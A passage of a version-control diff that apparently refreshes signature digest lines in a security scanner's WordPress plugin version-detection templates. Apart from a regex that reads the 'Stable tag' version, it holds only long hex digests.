490a00463044022077394a1c92c8599eccef4e8345774adc6016e130584a638040907ce4df1af2cb02206d9f3ad1d6f3207cda3fd5c6b6e33a22ee8abfc7a0586ba3b8910f8d17ef4d77:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ca371607df25293fa392f865b86914f871069b2d318780f9416296d4ad7f3eba022072ca8452a581fc844f61a4186342c62c0e736eb6c75c03ea9effacb1e61e07b6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml index f0d4ab8e2e..c64910675b 100644 --- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml +++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100d9930e23699201e4c56e617b5b50a6c7418a84bfbb84770be38c7207aaaefefe02201a8f92ea089724ca8c2af90a69499d6b6a1a64b82e57b025b9e2773ed17d9033:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022025684f3d7a9f3447cdb8585b1a85b36b41644e27c7d86d3366808c2d13171e75022100f3a5f8af0d89733227b90af633683b47a5d7b5b17b35bb10b7b86a8d9c218707:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml index e89cbd0654..f2bd53b5e8 100644 --- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml +++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a00463044022073e6d2c521c50b9c44e5c1dcc56033332185e683874397b19fd92de9849dbd6502206911820ec20012c35ab35b84f7ea052257b00430d7f6decf0bc37dae9a7a706a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022046c4cb99489c4de2d51559fc5acbec37076ffe90ea2f3a394bf435ed3b48e028022052e975e37e28e6e51ffad8cc4c8794e54bc3ebcd1020cbbefd217d44c85b5af2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml index e52efc37d9..042879a500 100644 --- a/http/technologies/wordpress/plugins/svg-support.yaml +++ b/http/technologies/wordpress/plugins/svg-support.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402201e4ecbf3b6fadb7fe9c79bfe4f75e18503fe7215fec087d686cb38c39220be9d02207807db11248844df957e427bf85e62221809ff41614ef301a08a7fb589a2c2bf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f8b2df050312ae77bc4549a3912626c7d9863ea790ba10f25b0f002ffe57eb0902202b7ebaf91e2e7910794e86d7ce1f4d402c86932cc8882b9d60932c7c26b1c90c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml index 314a530a78..099047775a 100644 --- a/http/technologies/wordpress/plugins/tablepress.yaml +++ b/http/technologies/wordpress/plugins/tablepress.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100c569f9573e97adaaf0185170f96e4383900d8870f82d8bb15c94ec9740c260020221009ad10fcb12f99345d8e3f4104d7b4d4e6a97cfb4d71bbab4c62c7b1e9293d7d5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b65a0a9b8bcd71277ca674a23b27a453906fefa1fa379e531049f44ffe947565022100cce87ab9f19983bdc13821713ee95efd982e9a2039b8388a31c5e4ef511e61c0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml index a92e0f8e76..1f184254aa 100644 --- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml +++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a004730450220777f0f2b44385235e92d82dd610538966e73850b9751e16dc11ff68134eebb0d022100802b37adf210b41e232f67159c734845b4a0a9ae1019fe57d0bfb04ef1446d96:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100aba143016fe3acff6daa16ab74f7d9ae9698e8a96adff42d2932d277a263873a022100eba15ef053524702af11cca442b84d11752f3d6720485afae77cb0992b8f5a5a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/templately.yaml b/http/technologies/wordpress/plugins/templately.yaml index 068e925ec0..aaed997ccd 100644 --- a/http/technologies/wordpress/plugins/templately.yaml +++ b/http/technologies/wordpress/plugins/templately.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100baa0fbd768a3c6e7fe0c908a744833f6c9c9935e7f42da9dfed212be5832dcda022009b02b66429825febd35642ff067262d319dfbf46d7d22f5ab665d8fc7058a81:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220433b6c89551ad7550a745c3b03180ce5a0c45d13eca39e2a4485c499f533e0f50220327f9138846993219976c061235c0e8b105f6e67ccc1161c6b657ffa14c790e7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml index 698168e580..721c866c1d 100644 --- a/http/technologies/wordpress/plugins/the-events-calendar.yaml +++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a004830460221008177f5cfd0114401b4b8e168be1ef68101713bcc6e6410f35a34b980421a3648022100bdbb0ecd24c03155c2a9096141c28c98fac9e8502a89d58fe8be155c5b94fdc0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022040995da80d5e871de2a33da2af9c7703f29be557c02de23ffd344efa6ffe22a60220714e227488382121026c619b11ce8436920d33a93e933352a9be64669c214994:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml index acb0b5bd75..dab38b80c2 100644 --- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml +++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a00463044022033dfa167b78dfdb587db1856ec232aaa4d6dbfa188cf78d3bcc8123013f565ca022047327f7189f462c2e1d285f1ec98141a808981d5fd4e19401a7c94fccc032e36:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100811bccdd05b248c0d1996f39272e77c6b63ef9eb40547caa6e0736427eba7b190221008214f249d1771f746ff361976ee43da6f9c226e61f608b91f77c1bf30425cf47:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml index 85ca1a53f7..cf1a5d396b 100644 --- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml +++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100bb791da54617603c2a86d8fbbbc6186265b00cb3cf9aaddbe4368dc46f6b415602206f85d4a9ecbd6d2eb4243d876f458d36a2c6eab2e62f73b16418069df8b71637:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ec85a36070bb60d972be6fbddbddba86336c56171669e077d9182e91d9a0e2e10220342e8c3211a6a3c442a8b4ba8ba9c07c08133a1b4cdee2ca4ef1b77097183c68:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml index 25ba704ceb..01e95baad7 100644 --- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100c3f37dea866a6cb9fa6df1b765f5b3d9ed71fc43330d1149efe86a47d6c95a48022100810660fbc204d2c1c1cb8ca21bd2fe4a1cc0a580757bce501912351553b0e570:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220214a21bee950f130c12dec06f3838637094e6b462ff480039811ac014c649db30221008e5ed6069231dc0d78d5744915decba1aec47f9c4dc3e845eb98886a26d3b1f3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml index ca8f77ec25..1ee741560c 100644 --- a/http/technologies/wordpress/plugins/under-construction-page.yaml +++ b/http/technologies/wordpress/plugins/under-construction-page.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022066e7e5481d2403861355214caf66f75a16a7b7925da6803a3429db93bf6dc5ce022100f54bd85a6699a1f6c45ab4330f61fabab896eda205d195531893cf9c65a08e2a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203c1919663c88b747dc377c8509d225d0a84b61d352c3fbf7a38525254453b065022100b79c453f8834f5fa9fb8af1b6fe0ca3f291c3a472f23891dfb75546397111256:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml index a00cf91d3a..d631843cd4 100644 --- a/http/technologies/wordpress/plugins/updraftplus.yaml +++ b/http/technologies/wordpress/plugins/updraftplus.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100f9d17113d8e677177fe11ca568507176de05f9cc24462e741cb1fd954f236f45022100d0a2dd584aad1ddc1f367313504f024ce470e59331e7bbc5693a1b53b4cf7b81:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ea2a4d248c15fb69e80d22dc81dbabc9a8ed8f3f33b7c86a097653a1ab8ebe3f02205109c45255a7f4e8412d5d5b41de6454faab62e10666af9fdeed042dee9ea014:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml index 05c57a0e9a..432304f83a 100644 --- a/http/technologies/wordpress/plugins/user-role-editor.yaml +++ b/http/technologies/wordpress/plugins/user-role-editor.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a00463044022060fe418e50a9dbe7e6486ce4bc562e295ca0ec9c9f4e3c42be7eecee9803707102201c0eda712fb363a556bd9dfde8a26c3d38d2a734b3c5094c20e153e58b41d211:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201791cd670d5b6994119f869c64b52c7dce169cc8952539821e81a3d5756f4ffe022100dcffc34a63367d28091c3b7f0589af4f147f5dd729a4cf1de027289c222d7a3f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml index 61350d4a5b..0467491c83 100644 --- a/http/technologies/wordpress/plugins/w3-total-cache.yaml +++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100960bc204fc9ff8d00b166f5059b358cf7fcce3966cab5d4ae088a698897016c0022038105344304afed2ff95b0a51053773e451d97dc74849f81a88e84723838e37a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d6c6c2916f555b31963609266b83a8aac740fac39beb578b84d9c7839ac35bac022100f4ee5919975456b3504a1a4a93a19740eb302c6ba4d2db6a434df0f2eb29493f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml index a37f8b3aa8..97b836f213 100644 --- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml +++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a004730450220197cfb7d0c6f1f99daadf7b2c4dd3935c0493a9c9f0e371c4e8e398334db3d7302210084908256e8f7ba3a68443f88c940908291c043d797cdb590e2abf63bfe0ec617:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e587cf9aca749c30b35fa91552687e38339ce5665e64a469b7f00d74ca5d080102200980c5c8bc946f054ab9fbc8dd1fe0432c5cad3b2710cb70fd40d054207f4d24:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml index 1a82f6ee83..a352a6adfb 100644 --- a/http/technologies/wordpress/plugins/webp-express.yaml +++ b/http/technologies/wordpress/plugins/webp-express.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100fd12022f7b2c0b5d1c580378235d103a499816a905b54af3ffae06edad852d6402210080fed3e786ce64cfa7793c765a86432e21c2fb3887cb82a9e0ebd82b8b2f47e9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210086ec3b09b3572ef7f1cdd444a73c7bafe0681948e90225d58581abdf858f0c3202203c6d9d99a891a6c042282333b86676e76e2731989fd8a22c78cdf53cd9929d7a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml index 38bd3b3f7a..fcdf52d854 100644 --- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml +++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502203d127e01757889b97cd00bc2a794f657917486b73cae076abe2b59224567fb29022100e1309e80f17b8cd020f5eb416c717f68896a322f72a553e46abac1703c66f896:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204efe713807b8850a9cbd4f1e210d9ca611a363fcefb7093068ee8f1166769d8302207caf696c8db272c45f33034736086da56837a93fa4e7ce73eb7d0494bf30043f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml index 411077e12a..33d1b2be60 100644 --- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml +++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402206513430b2c1fa539cb3b80fad0d1165f5c3f43c0fb694dff61d7eb945a23ca1b02203978d519173b3a55a2c8b30376255f144f063c675336ead55312199ac65f9343:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100bf1f7b3e1e464b9c7fccba7f9e77241d5c656d9e4fd7f1b7c4e9062eb87432e9022100f9f39d9822026a4797e402b6b7e7c94a9865a92eca25e54097de11b710505b74:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml index 606ef9f4f0..22f9b21fed 100644 --- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml +++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100e22a931a14954e25d290302dff4ee4c205bb8dc4153e065c1ed724fc610647b502202891cc07b36e05335920397b804d69fd1f5626556f762ef0ee4589794782f825:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205b65ef513ae648feb756a7be97c64f8bda18833ffffa63b988c36837f4c40d720221009b2b6a222ce0383d172e5fd5c1b5d63433a18e4401117103216462e7c7dcaa71:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml index a9f52a71b6..e644331aeb 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402205d848ebfc333ae49ab0f7d6ba97953e79a00b5a5aace0ae186505bf4fcf3d6440220099c9721e2fc9b92e5cba5028f6c2a93d7efcd93e904d7b690bf59f039a5f852:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220171a625a143e213574730703315cc50471370a07cedd5b3d53d40985e027880202203b8505172285a31079aa57138c93d66906bc715287bf210c634412fda837f8e5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml index 686a349ba3..f4b8988a02 100644 --- a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100b7c7b5ee452beaa4a4397c3c0521c5bfadd8ffa930a16923d362f009d66b3d4a022100cf34a34b8c21e34308ba1e89d5161d43cc97ab3451ff788c466b7605e76107f4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022035fdac9e89ffdba7845f4192521a4b5512a522f9e49abd95458d16c5b7218ff1022068b236e34e5aec94c645ea71e870d9d9736004affc22621ada13cee8c5b47a66:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml index e5aa56abc4..1d90d2431c 100644 --- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402205c31a0eda8684a2587620643bac258a1e68dbf7e2a86b460222a188cc0abbee9022007fdaa2f412da8298156c7b17cfa00d624abdfe2000b92220e64594fb37a6761:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022041fba8fa274438ee59da0b5a6db2d767b79e95b49821bd8889a558b144f81641022009e7c1e25a5952477eb218e227e52d74a9ad61dc43436cf240fdc636999b088c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml index 11f6c6474b..af33ffa5af 100644 --- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a004730450220268cafe7717a7862d0cf344bda5c282ad049f3dd84981ae7d23e49606490d3ef022100b860ba97dc2645b0edf289c620eddad194f1cc66e2b5ff24b6acc4b9fc5c1641:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201f6a7551aed4c85d7b7855087ec3715544e11624a1bb6557b3af645b9c95a63102210096a744e859784ecd51679c7e352e4579e65f61dce2867dcd3208a685436b600b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml index f8d5d6181d..6ed31bc0a4 100644 --- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100ba1cbb466b63df9bfa5bbae5ed56e73553d80c09c35341b5c2d4d9c21c32b0b9022021b8013e0f4f233ae3179398c03f4ee504db6398e42361ee8f64dc5be0a9b544:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203b5e6ad7c6d546429f11f5d78d3a5703ad0eb587d399b3a04e53097c5c688b5702207b7d611e957639c273099bcb6b9cec3ea9ab48edd589cc8539c45629a9673409:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml index 2766c05035..0f5a0081d3 100644 --- a/http/technologies/wordpress/plugins/woocommerce-services.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100a90f59608c038ae1b1e39901813c96e1bd51c4c2afe9ab5067f092111d777a8602206c8624758d5818b146e6380c77394d8bac0dd66da7c5d74dad3ae932fb09ac33:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d8bc3fc1ef3e75ae973584948712a6414ebeafde4ebbd472c294c5a77b929347022077d9a1e598fcd0a24c46ca2248fa378767cc5363b6850b6d711e6cacf528d837:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml index d8a9cd179c..b43dc0fa04 100644 --- a/http/technologies/wordpress/plugins/woocommerce.yaml +++ b/http/technologies/wordpress/plugins/woocommerce.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100a6b34ad75fdcf5316dfadc2c4f918b12fe134ff703a31357499e31089a15c3a902202b93180c100627bee00eb49d23284b4e24e71b1638465cfd7e71c75c82e5dea1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b8537a8c7c03170e1ee09834bf374ef74b1f32478fa3cba0cc06bd2c70ce9dfe022100b893625e4dab67a476cd685b0b7cbfc179a7c48431b00223482ce778cfe4cd63:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml index c4d4244057..d7fc7c495f 100644 --- a/http/technologies/wordpress/plugins/wordfence.yaml +++ b/http/technologies/wordpress/plugins/wordfence.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100a5460cac4c22179c90941fb107114246ebf73dd2364a6c37ee95212beada2c01022100cefee74aeb97b5814ddba52dbcaaf766707711e4645b8f5125e354725f8cdb73:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220526cac97a5a6ed886f2a3a03e2df078ceb96f8b73b25b9532315cfe91b89be27022042db74d9690d4e7185e3060b0937dd856148775f9c5d48ef8c169ac67ad19fbc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml index 6d7ec22889..0272598652 100644 --- a/http/technologies/wordpress/plugins/wordpress-importer.yaml +++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a00463044022013cf5d6ca55ed1e09d446a54fc2efdcbaf76b2e73f1fcac1f58e5c040ee4fdff02201ac52471cd60a0df6a6cbba5fc1c3ac7916ad71cfaed17fc3346f05a272824e1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022012daba69af3a0e3c4bc8615b12916a0f85674f5c877a8b70596745d219092edb02203c154be81ccdc109c6cb994047ca71d77825eab9fb391606ef02aeec22090eab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml index 2c41d121b4..4fcbbca298 100644 --- a/http/technologies/wordpress/plugins/wordpress-seo.yaml +++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100e1a4c4856b58c0d5dd42dea29542160a3295943db7698b116322e16aa18a872b022100b960823ef08c97874c6b7950ade5b00626e535a3a011eaaafd0bf2b6c14d13d8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220105ae8031fad3556ca5b561614fde28be962a812f982fd3fa0a809fbf2fe0830022015fa8be0630b297e91f0caf25847d393fa39124896bfb58c1d22cc8d283a728b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml index a67e25ad6b..078c404382 100644 --- a/http/technologies/wordpress/plugins/worker.yaml +++ b/http/technologies/wordpress/plugins/worker.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100c8c38c918324abed1deb889814346be10dc4b014a1a92eb2c2dc50c37f57e44202206275c623b6fcd987f0136d56cce7cab93d1852a73dc7725051f699f35e12efc0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100efd93b66022aafd3db3b86d9493cededbfa270e3e437536090f37b82eb7fd8b20221009066711878a01510fa9cf17507ca25891bedefbd4b8335cd33b50b7b627888ab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-crontrol.yaml b/http/technologies/wordpress/plugins/wp-crontrol.yaml index 381e6ecaf3..a31d884c00 100644 --- a/http/technologies/wordpress/plugins/wp-crontrol.yaml +++ b/http/technologies/wordpress/plugins/wp-crontrol.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502210088c5955837dc1b5e7e69d5a0687fecb3cb0dcf6b23447e3d86ff4ed13324374e02202b587b9e86093287481fcd7b9fe00857703d4ea75d5425f1f4d872b5caf089c5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022065d1a6cb4e732a2a3146029a9d6b9af27b1f53e79cb4ecc1b64ea752043d2caf02210086f7eb156d0dc9ea65932eaf224025234ef6e6acee1958b937a6f9464a62010e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml index 5eafe78e85..108dee77ff 100644 --- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100e9542d943a0fe0c4c27401d1a5a05356ed0018419a69324e86fd8a0fb98b9ad302202e716a1549ead7b6a40ce32deb413fa2dd4493985103c44d3cbac2af784543df:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022054e2aa00f5fa16f3cfb3470532e88c0bb788a6fd622b5afea848f1938ec80875022100ad453252602c89bb38b479bc1cc97c76e079e0c1a83b243a6539fd61402c1197:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml index c12d8c0566..082dfcacbe 100644 --- a/http/technologies/wordpress/plugins/wp-file-manager.yaml +++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a004730450220547492df3d4273121630ae5ba38abbe01dd4c0ed7ae71c221e964d93ac560815022100ed623384c7692d0d9e5504f5cf0b87e2e1c316b7cf66897c99d0666125a7fcaf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 